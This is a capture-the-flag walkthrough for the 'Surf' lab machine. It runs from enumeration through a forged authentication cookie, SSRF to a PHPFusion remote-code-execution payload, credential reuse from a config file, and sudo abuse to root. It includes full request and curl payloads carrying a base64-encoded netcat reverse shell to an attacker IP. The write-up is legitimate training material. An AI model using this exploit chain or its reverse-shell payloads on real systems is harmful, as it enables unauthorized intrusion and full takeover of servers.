Skip to content

PG - SURF | Walkthrough

TLDR
  • Bypass Auth -> SSRF -> RCE
  • Exploit misconfigured sudo privilege to root

Enumeration

Nmap 

┌──(imtodess㉿deathnote)-[~/ctf/pg/surf/scans]
└─$ nmap $ip -p22,80 -sCV                          
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-25 11:44 +0545
Nmap scan report for 192.168.194.171                                                                 
Host is up (0.22s latency).  
PORT   STATE SERVICE VERSION                         
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:                              
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)                             
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)                          
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Surfing blog                                                
|_http-server-header: Apache/2.4.38 (Debian)                                     
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
Service detection performed. Please report any incorrect results at https://nmap.org/submit/                                 
Nmap done: 1 IP address (1 host up) scanned in 24.74 seconds
WEB Directory Fuzzing 
┌──(imtodess㉿deathnote)-[~/ctf/pg/surf/scans]
└─$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --no-error -q  -x php,html,txt                                          
/about.html           (Status: 200) [Size: 5220]
/administration       (Status: 301) [Size: 327] [--> http://192.168.194.171/administration/]        
/assets               (Status: 301) [Size: 319] [--> http://192.168.194.171/assets/]           
/css                  (Status: 301) [Size: 316] [--> http://192.168.194.171/css/]
/index.html           (Status: 200) [Size: 6495]
/index.html           (Status: 200) [Size: 6495]            
/js                   (Status: 301) [Size: 315] [--> http://192.168.194.171/js/]
/post.html            (Status: 200) [Size: 5724]
/server-status        (Status: 403) [Size: 280]

Exploitation

Initial Exploitation

SSRF to PHPFUSION RCE https://www.exploit-db.com/exploits/49911 - Bypass login by changing the value of auth_status cookie to eydzdWNjZXNzJzondHJ1ZSd9 while login. 

┌──(kali㉿kali)-[~]
└─$ echo "{'success':'true'}" | base64
eydzdWNjZXNzJzondHJ1ZSd9
- SSRF on /administration/checkserver.php, also mentions the use of PHPfusion

Exploit using Burp 

POST /administration/checkserver.php HTTP/1.1
Host: 192.168.194.171
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://192.168.194.171
Connection: close
Referer: http://192.168.194.171/administration/checkserver.php
Cookie: auth_status=eydzdWNjZXNzJzondHJ1ZSd9; PHPSESSID=d1juk9h3fogi4qv3am5p6t66kg
Upgrade-Insecure-Requests: 1

url=http%3a//127.0.0.1%3a8080/infusions/downloads/downloads.php%3fcat_id%3d${system(base64_decode(bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDkuMTk0IDgwODEK))}
** Exploit using Curl** 
curl -X POST http://$ip/administration/checkserver.php -d '''url=http://127.0.0.1:8080/infusions/downloads/downloads.php?cat_id=${system(base64_decode(bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDkuM
Tk0IDgwODEK))}''' --cookie "auth_status=eydzdWNjZXNzJzondHJ1ZSd9; PHPSESSID=d1juk9h3fogi4qv3am5p6t66kg"

Privilege Escalation

Get creds for user james from config 

www-data@Surf:/var/www/server/administration/config$ cat config.php    
define('DB_HOST', "localhost");                                                                 
define('DB_USER', "core");                                                  
define('DB_PASSWORD', "FlyToTheMoon213!");
define('DB_NAME', "corephpadmin");
ssh as james , check its sudo privileges 
┌──(imtodess㉿deathnote)-[~/ctf/pg/surf/scans]
└─$ ssh james@$ip 

$ sudo -l            
[sudo] password for james: 
Matching Defaults entries for james on Surf:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User james may run the following commands on Surf:
    (ALL) /usr/bin/php /var/backups/database-backup.php
database-backup.php is writable by www-data 
james@Surf:/var/www/server/administration/config$ ls -la /var/backups/database-backup.php
-rwxr-xr-x 1 www-data www-data 2758 Nov  9 03:12 /var/backups/database-backup.php
Replace the original php file with reverse shell and execute it to get the root shell 
$ sudo /usr/bin/php /var/backups/database-backup.php
$ PHP Notice:  Undefined variable: daemon in /var/backups/database-backup.php on line 184
Successfully opened reverse shell to 192.168.49.194:8081

┌──(imtodess㉿deathnote)-[~/oscp/exploits]
└─$ nc -nvlp 8081            
listening on [any] 8081 ...
connect to [192.168.49.194] from (UNKNOWN) [192.168.194.171] 55636
Linux Surf 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
 03:11:44 up  2:19,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
james    pts/2    192.168.49.194   03:07    0.00s  0.00s  0.00s -sh
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/proof.txt
ce4fce190d3e6028770546e8e2bad828